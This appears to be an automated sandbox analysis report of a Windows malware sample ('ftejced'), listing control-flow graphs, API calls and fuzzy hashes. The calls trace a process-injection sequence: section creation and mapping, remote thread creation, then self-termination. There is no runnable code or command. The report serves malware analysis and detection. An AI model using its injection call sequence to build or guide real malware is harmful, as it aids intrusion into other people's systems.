                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_400000_ftejced.jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                      • String ID:
                                                                                      • API String ID: 1546783058-0
                                                                                      • Opcode ID: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                                                                      • Instruction ID: 1fc6fb52bb36dddf8f971a96ecfe927bdbae9887f6286775c14151e9c1d92244
                                                                                      • Opcode Fuzzy Hash: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                                                                      • Instruction Fuzzy Hash: 13512B71900245BBEB209F91CC88FAF7BB8EF85B00F14416AF912BA2E5D6749945CB64

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 459 401565-401590 call 4011b7 464 401592 459->464 465 401595-40159a 459->465 464->465 467 4015a0-4015b1 465->467 468 4018b8-4018c0 465->468 472 4018b6-4018c5 467->472 473 4015b7-4015e0 467->473 468->465 475 4018da 472->475 476 4018cb-4018d6 472->476 473->472 482 4015e6-4015fd NtDuplicateObject 473->482 475->476 478 4018dd-401915 call 4011b7 475->478 476->478 482->472 483 401603-401627 NtCreateSection 482->483 486 401683-4016a9 NtCreateSection 483->486 487 401629-40164a NtMapViewOfSection 483->487 486->472 488 4016af-4016b3 486->488 487->486 490 40164c-401668 NtMapViewOfSection 487->490 488->472 492 4016b9-4016da NtMapViewOfSection 488->492 490->486 493 40166a-401680 490->493 492->472 495 4016e0-4016fc NtMapViewOfSection 492->495 493->486 495->472 498 401702 call 401707 495->498
                                                                                      APIs
                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_400000_ftejced.jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                      • String ID:
                                                                                      • API String ID: 1546783058-0
                                                                                      • Opcode ID: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                                                                      • Instruction ID: d88667ffe02cbbb2798d41d5ad0cf6527765788d972b82ac88077c7d238bff09
                                                                                      • Opcode Fuzzy Hash: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                                                                      • Instruction Fuzzy Hash: 54511A71900205BFEF209F91CC89FAFBBB8FF85B10F104259F911AA2A5D7759941CB64

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 500 401579-401590 call 4011b7 506 401592 500->506 507 401595-40159a 500->507 506->507 509 4015a0-4015b1 507->509 510 4018b8-4018c0 507->510 514 4018b6-4018c5 509->514 515 4015b7-4015e0 509->515 510->507 517 4018da 514->517 518 4018cb-4018d6 514->518 515->514 524 4015e6-4015fd NtDuplicateObject 515->524 517->518 520 4018dd-401915 call 4011b7 517->520 518->520 524->514 525 401603-401627 NtCreateSection 524->525 528 401683-4016a9 NtCreateSection 525->528 529 401629-40164a NtMapViewOfSection 525->529 528->514 530 4016af-4016b3 528->530 529->528 532 40164c-401668 NtMapViewOfSection 529->532 530->514 534 4016b9-4016da NtMapViewOfSection 530->534 532->528 535 40166a-401680 532->535 534->514 537 4016e0-4016fc NtMapViewOfSection 534->537 535->528 537->514 540 401702 call 401707 537->540
                                                                                      APIs
                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_400000_ftejced.jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                      • String ID:
                                                                                      • API String ID: 1546783058-0
                                                                                      • Opcode ID: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                                                                      • Instruction ID: 7169477154cf1621f4f222e223ad54e678f31395e99d0ffd613e12cb64d905d3
                                                                                      • Opcode Fuzzy Hash: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                                                                      • Instruction Fuzzy Hash: 2B511A75900245BBEF209F91CC88FEF7BB8FF85B10F104119F911BA2A5D6759941CB64

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 542 40157c-401590 call 4011b7 546 401592 542->546 547 401595-40159a 542->547 546->547 549 4015a0-4015b1 547->549 550 4018b8-4018c0 547->550 554 4018b6-4018c5 549->554 555 4015b7-4015e0 549->555 550->547 557 4018da 554->557 558 4018cb-4018d6 554->558 555->554 564 4015e6-4015fd NtDuplicateObject 555->564 557->558 560 4018dd-401915 call 4011b7 557->560 558->560 564->554 565 401603-401627 NtCreateSection 564->565 568 401683-4016a9 NtCreateSection 565->568 569 401629-40164a NtMapViewOfSection 565->569 568->554 570 4016af-4016b3 568->570 569->568 572 40164c-401668 NtMapViewOfSection 569->572 570->554 574 4016b9-4016da NtMapViewOfSection 570->574 572->568 575 40166a-401680 572->575 574->554 577 4016e0-4016fc NtMapViewOfSection 574->577 575->568 577->554 580 401702 call 401707 577->580
                                                                                      APIs
                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_400000_ftejced.jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                      • String ID:
                                                                                      • API String ID: 1546783058-0
                                                                                      • Opcode ID: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                                                                      • Instruction ID: 14f4b29c405daff92d21e2b3eea283823ae405efc36948ac0d92101f557811aa
                                                                                      • Opcode Fuzzy Hash: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                                                                      • Instruction Fuzzy Hash: DE51F9B5900245BBEF209F91CC88FEFBBB8FF85B10F104259F911AA2A5D6709944CB64

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 582 402fe9-40300d 583 403140-403145 582->583 584 403013-40302b 582->584 584->583 585 403031-403042 584->585 586 403044-40304d 585->586 587 403052-403060 586->587 587->587 588 403062-403069 587->588 589 40308b-403092 588->589 590 40306b-40308a 588->590 591 4030b4-4030b7 589->591 592 403094-4030b3 589->592 590->589 593 4030c0 591->593 594 4030b9-4030bc 591->594 592->591 593->586 596 4030c2-4030c7 593->596 594->593 595 4030be 594->595 595->596 596->583 597 4030c9-4030cc 596->597 597->583 598 4030ce-40313d RtlCreateUserThread NtTerminateProcess 597->598 598->583
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_400000_ftejced.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateProcessTerminateThreadUser
                                                                                      • String ID:
                                                                                      • API String ID: 1921587553-0
                                                                                      • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                      • Instruction ID: 3e1675bac70c022a4e457ffe6b5fa54937b73e0116388ba90aec32851b4d9964
                                                                                      • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                      • Instruction Fuzzy Hash: A1412431228E088FD768EF5CA885762B7D5F798311F6643AAE809D7389EA34DC1183C5

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 417d6f-417d89 2 417d8b-417d90 0->2 3 417d92-417da4 2->3 4 417da6 2->4 5 417dac-417db2 3->5 4->5 6 417dc5-417dcb 5->6 7 417db4-417dbb 5->7 6->2 8 417dcd 6->8 7->6 9 417dcf-417dd4 8->9 10 417de2-417de8 9->10 11 417dd6-417ddc 9->11 10->9 12 417dea-417df4 10->12 11->10 13 417dfa-417e72 lstrcatW InterlockedExchangeAdd WriteConsoleA lstrcpynW GetAtomNameA SetFileApisToANSI SetVolumeMountPointA GetModuleFileNameW EnumDateFormatsA 12->13 14 417e8c-417e8d 12->14 16 417e74-417e77 13->16 17 417e7e-417e8b 13->17 15 417e8f-417e99 14->15 18 417e9b-417ea4 GlobalAlloc AddAtomA 15->18 19 417eaa-417ec5 GetCommProperties SetLastError 15->19 16->17 17->14 18->19 20 417ec7-417ec8 GetProcessDefaultLayout 19->20 21 417ece-417ed8 19->21 20->21 24 417ee1-417ef6 GetConsoleAliasesA 21->24 25 417eda-417edb ReleaseActCtx 21->25 27 417ef8-417eff 24->27 28 417f0c-417f13 24->28 25->24 27->28 29 417f01-417f06 FoldStringW 27->29 28->15 30 417f19-417f23 28->30 29->28 31 417f25-417f47 30->31 32 417f94-417fa2 call 417af5 30->32 36 417f67-417f91 GetConsoleAliasesLengthW 31->36 37 417f49-417f5d SetConsoleTitleA LocalFree 31->37 38 417fa4-417fd6 32->38 39 417fe7-417ff3 LoadLibraryA call 417b32 call 417b14 32->39 36->32 37->36 40 417fe2-417fe5 38->40 41 417fd8 38->41 48 417ff8-417fff call 417d30 39->48 40->38 40->39 41->40 52 418000-418005 48->52 54 418007 call 417b09 52->54 55 41800c-418012 52->55 54->55 55->52 57 418014 55->57 58 41801e-418024 57->58 60 418032-418039 58->60 61 418026-418030 58->61 60->58 62 41803b-418047 60->62 61->60 61->62
                                                                                      APIs
                                                                                      • lstrcatW.KERNEL32(?,00000000), ref: 00417E02
                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00417E10
                                                                                      • WriteConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00417E27
                                                                                      • lstrcpynW.KERNEL32(?,00000000,00000000), ref: 00417E36
                                                                                      • GetAtomNameA.KERNEL32(00000000,00000000,00000000), ref: 00417E3F
                                                                                      • SetFileApisToANSI.KERNEL32 ref: 00417E45
                                                                                      • SetVolumeMountPointA.KERNEL32(00000000,00000000), ref: 00417E4D
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00417E5C
                                                                                      • EnumDateFormatsA.KERNEL32(00000000,00000000,00000000), ref: 00417E65
                                                                                      • GlobalAlloc.KERNEL32(00000000,00000000), ref: 00417E9D
                                                                                      • AddAtomA.KERNEL32(00000000), ref: 00417EA4
                                                                                      • GetCommProperties.KERNELBASE(00000000,?), ref: 00417EB2
                                                                                      • SetLastError.KERNEL32(00000000), ref: 00417EB9
                                                                                      • GetProcessDefaultLayout.USER32(00000000), ref: 00417EC8
                                                                                      • ReleaseActCtx.KERNEL32(00000000), ref: 00417EDB
                                                                                      • GetConsoleAliasesA.KERNEL32(?,00000000,00000000), ref: 00417EEA
                                                                                      • FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00417F06
                                                                                      • SetConsoleTitleA.KERNEL32(00000000), ref: 00417F4A
                                                                                      • LocalFree.KERNEL32(00000000), ref: 00417F51
                                                                                      • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00417F68
                                                                                      • LoadLibraryA.KERNELBASE(0041A448), ref: 00417FEC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1779981912.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_40b000_ftejced.jbxd
                                                                                      Similarity
                                                                                      • API ID: Console$AliasesAtomFileName$AllocApisCommDateDefaultEnumErrorExchangeFoldFormatsFreeGlobalInterlockedLastLayoutLengthLibraryLoadLocalModuleMountPointProcessPropertiesReleaseStringTitleVolumeWritelstrcatlstrcpyn
                                                                                      • String ID: k`$tl_$}$
                                                                                      • API String ID: 2707108674-211918992
                                                                                      • Opcode ID: 5247a80322c137a15aa0b1bfea1bb19969df6e1595c2137d50653716045b0f87
                                                                                      • Instruction ID: ddf06cef7b4f2340048b7641273970f77a1e110b5080587248a091a61e489f39
                                                                                      • Opcode Fuzzy Hash: 5247a80322c137a15aa0b1bfea1bb19969df6e1595c2137d50653716045b0f87
                                                                                      • Instruction Fuzzy Hash: FE61AE71506124ABD725AB66EC58DEF3F7CFF0A355B10417AF205D2121CB388A82CBAD

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 115 67003c-670047 116 67004c-670263 call 670a3f call 670e0f call 670d90 VirtualAlloc 115->116 117 670049 115->117 132 670265-670289 call 670a69 116->132 133 67028b-670292 116->133 117->116 138 6702ce-6703c2 VirtualProtect call 670cce call 670ce7 132->138 135 6702a1-6702b0 133->135 137 6702b2-6702cc 135->137 135->138 137->135 144 6703d1-6703e0 138->144 145 6703e2-670437 call 670ce7 144->145 146 670439-6704b8 VirtualFree 144->146 145->144 148 6705f4-6705fe 146->148 149 6704be-6704cd 146->149 150 670604-67060d 148->150 151 67077f-670789 148->151 153 6704d3-6704dd 149->153 150->151 154 670613-670637 150->154 157 6707a6-6707b0 151->157 158 67078b-6707a3 151->158 153->148 156 6704e3-670505 153->156 161 67063e-670648 154->161 165 670517-670520 156->165 166 670507-670515 156->166 159 6707b6-6707cb 157->159 160 67086e-6708be LoadLibraryA 157->160 158->157 162 6707d2-6707d5 159->162 170 6708c7-6708f9 160->170 161->151 163 67064e-67065a 161->163 167 6707d7-6707e0 162->167 168 670824-670833 162->168 163->151 169 670660-67066a 163->169 171 670526-670547 165->171 166->171 172 6707e4-670822 167->172 173 6707e2 167->173 175 670839-67083c 168->175 174 67067a-670689 169->174 176 670902-67091d 170->176 177 6708fb-670901 170->177 178 67054d-670550 171->178 172->162 173->168 179 670750-67077a 174->179 180 67068f-6706b2 174->180 175->160 181 67083e-670847 175->181 177->176 183 670556-67056b 178->183 184 6705e0-6705ef 178->184 179->161 185 6706b4-6706ed 180->185 186 6706ef-6706fc 180->186 187 67084b-67086c 181->187 188 670849 181->188 189 67056f-67057a 183->189 190 67056d 183->190 184->153 185->186 191 6706fe-670748 186->191 192 67074b 186->192 187->175 188->160 193 67057c-670599 189->193 194 67059b-6705bb 189->194 190->184 191->192 192->174 199 6705bd-6705db 193->199 194->199 199->178
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0067024D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1780382606.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_670000_ftejced.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID: cess$kernel32.dll
                                                                                      • API String ID: 4275171209-1230238691
                                                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                      • Instruction ID: 3765450f4516cd5a446ec64091ac8bb535a0f3870ef1ebb4caee572cfbf4afc2
                                                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                      • Instruction Fuzzy Hash: 69526A74A01229DFEB64CF58C985BA8BBB1BF09304F1480D9E54DAB351DB30AE95DF24

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 599 50fdb1-50fdca 600 50fdcc-50fdce 599->600 601 50fdd0 600->601 602 50fdd5-50fde1 CreateToolhelp32Snapshot 600->602 601->602 603 50fdf1-50fdfe Module32First 602->603 604 50fde3-50fde9 602->604 605 50fe00-50fe01 call 50fa70 603->605 606 50fe07-50fe0f 603->606 604->603 609 50fdeb-50fdef 604->609 610 50fe06 605->610 609->600 609->603 610->606
                                                                                      APIs
                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0050FDD9
                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 0050FDF9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1780256705.000000000050D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0050D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_50d000_ftejced.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                      • String ID:
                                                                                      • API String ID: 3833638111-0
                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                      • Instruction ID: 4d8003d6bb17ca19460313de374bf89ad96b673ba7111da5dc0f1f277a61f756
                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                      • Instruction Fuzzy Hash: BDF06D32200711ABD7302AB9A88DBAE7AECBF49725F100539F646918C1DBB0EC454BA1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 612 670e0f-670e24 SetErrorMode * 2 613 670e26 612->613 614 670e2b-670e2c 612->614 613->614
                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE(00000400,?,?,00670223,?,?), ref: 00670E19
                                                                                      • SetErrorMode.KERNELBASE(00000000,?,?,00670223,?,?), ref: 00670E1E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1780382606.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_670000_ftejced.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorMode
                                                                                      • String ID:
                                                                                      • API String ID: 2340568224-0
                                                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                      • Instruction ID: 5a5a572b8c797ad976ea18bf62a4cab0582b95af9600aa588e6fb0acf5fca8fa
                                                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                      • Instruction Fuzzy Hash: 6FD01231145128B7D7002A94DC09BCD7B1CDF09B62F008411FB0DD9180C770994046E5

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 615 417b14-417b31 VirtualProtect
                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(00000040,?), ref: 00417B2A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1779981912.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_40b000_ftejced.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: bef717294446de930566c56004e6725fcd1278c60b61f264854cca6fbe4bfdb3
                                                                                      • Instruction ID: ba6cbb3cd07b257a8cb762b1762eaf264e462e583e55377f58ee2727f3315d2d
                                                                                      • Opcode Fuzzy Hash: bef717294446de930566c56004e6725fcd1278c60b61f264854cca6fbe4bfdb3
                                                                                      • Instruction Fuzzy Hash: 9BC08C7520020ABFCB018B82FC01E863B6CE308284F004271F702A00B0C2B1E900AB1C
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00001388), ref: 00401966
                                                                                        • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                        • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                        • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_400000_ftejced.jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                                      • String ID:
                                                                                      • API String ID: 1885482327-0
                                                                                      • Opcode ID: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                                                                      • Instruction ID: 41df8370e0b5f9a47a14a91e784646d83bdfa422f97ac69dcfec837627d5bcb0
                                                                                      • Opcode Fuzzy Hash: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                                                                      • Instruction Fuzzy Hash: 6D018CF520C148E7EB016A948DB1EBA36299B45324F300233B647B91F4C57C8A03E76F
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00001388), ref: 00401966
                                                                                        • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                        • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                        • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_400000_ftejced.jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                                      • String ID:
                                                                                      • API String ID: 1885482327-0
                                                                                      • Opcode ID: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
                                                                                      • Instruction ID: 34fc3aff5e218d4630d956a4f9c4c41b7245144a44faa4fd8074b33eba8f9d72
                                                                                      • Opcode Fuzzy Hash: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
                                                                                      • Instruction Fuzzy Hash: 43017CF5208145E7EB015A948DB0EBA26299B45314F300237B617BA1F4C57D8602E76F
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0050FAC1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1780256705.000000000050D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0050D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_50d000_ftejced.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                      • Instruction ID: b6e064d7d5a16856d920f7a2f464be9e2676c26c53f4bfa419b841481368a2b3
                                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                      • Instruction Fuzzy Hash: C1112B79A00208FFDB01DF98C989E98BFF5AF08751F1580A4F9489B362D771EA50DB80
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00001388), ref: 00401966
                                                                                        • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                        • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                        • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_400000_ftejced.jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                                      • String ID:
                                                                                      • API String ID: 1885482327-0
                                                                                      • Opcode ID: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
                                                                                      • Instruction ID: 53d82b158b021bc4b6cde56962adc0b8c8d23177238c0d6ee964112a53f005ae
                                                                                      • Opcode Fuzzy Hash: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
                                                                                      • Instruction Fuzzy Hash: 38F0AFB6308249F7DB01AA908DB1EBA36299B54315F300633B617B91F5C57C8A12E76F
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00001388), ref: 00401966
                                                                                        • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                                                        • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                                                        • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_400000_ftejced.jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                                      • String ID:
                                                                                      • API String ID: 1885482327-0
                                                                                      • Opcode ID: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
                                                                                      • Instruction ID: f7568a5a22988f4b084f7ac8228f9b89e575eda69d31bfffabc36cd9cbe45c64
                                                                                      • Opcode Fuzzy Hash: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
                                                                                      • Instruction Fuzzy Hash: BDF0C2B6208144F7DB019AA18DB1FBA36299B44314F300233BA17B90F5C67C8612E76F
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00001388), ref: 00401966
